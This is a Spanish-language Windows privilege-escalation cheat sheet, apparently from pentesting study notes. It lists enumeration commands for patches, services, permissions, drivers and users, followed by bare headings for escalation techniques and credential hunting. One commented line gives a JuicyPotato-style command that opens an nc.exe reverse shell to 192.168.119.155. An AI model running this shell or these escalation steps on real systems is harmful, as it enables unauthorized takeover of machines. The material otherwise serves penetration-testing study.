Enumeracion de Windows
Verificar el Sistema Operativo, Nivel de Parche, Básico
systeminfo
Systeminfo | findstr /B /C:"OS Name" /C:"System Type" etc ..
## Actualizaciones
wmic qfe get Caption,Description,HotFixID,InstalledOn
Wmic logicaldisk get caption,description
## Aplicaciones
wmic product get name, version, vendor
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
## Servicios
sc query state=all | findstr "SERVICE_NAME:"
wmic service get name,displayname,pathname,startmode
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
## Volumen
mountvol
## Drivers (en PowerShell)
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
whoami
echo %USERNAME%
whoami /priv
whoami /groups
whoami /all
# Si el usuario tiene privilegios SeImpersonate
# \\192.168.119.155\test\juicy.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c \\192.168.119.155\test\nc.exe -e cmd.exe 192.168.119.155 4447" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}
net user
net localgroup
net user /domain
net group /domain
net group /domain <Group Name>Firewall / AV / Defender
Red
Herramientas Automatizadas de Checklist
Aplicaciones y Servicios Instalados
Tareas Programadas
Inicios y Autoruns
Permisos de Servicio
Verificar si se puede modificar la configuración del servicio.
Verificar servicios con permisos de archivo débiles.
Ruta de Servicio Sin Citar
AlwaysInstallElevated
Servicio Disponible Solo Desde el Interior
Contraseñas en Archivos
Verificar savecred.
¿Podemos encontrar algún archivo SAM?
Configuración Desatendida
Registro
VNC
Autologin en Windows
Parámetros de SNMP
Putty
Buscar contraseña en el registro
REGSVC ACL
Explotación de Ruta de Servicio Sin Citar
Explotación de Permisos de Servicio Débiles
Explotación de Permisos Débiles del Registro
Explotación de Permisos Débiles del Archivo Ejecutable del Servicio
Escalación de Privilegios AlwaysInstallElevated
Secuestro de DLL
Credenciales almacenadas
Obtener contraseñas del registro de Windows
Buscar contraseñas en el registro
Archivos que pueden contener contraseñas
Encontrar todos los permisos de carpetas débiles por unidad.
Encontrar todos los permisos de archivos débiles por unidad.
Última actualización
¿Te fue útil?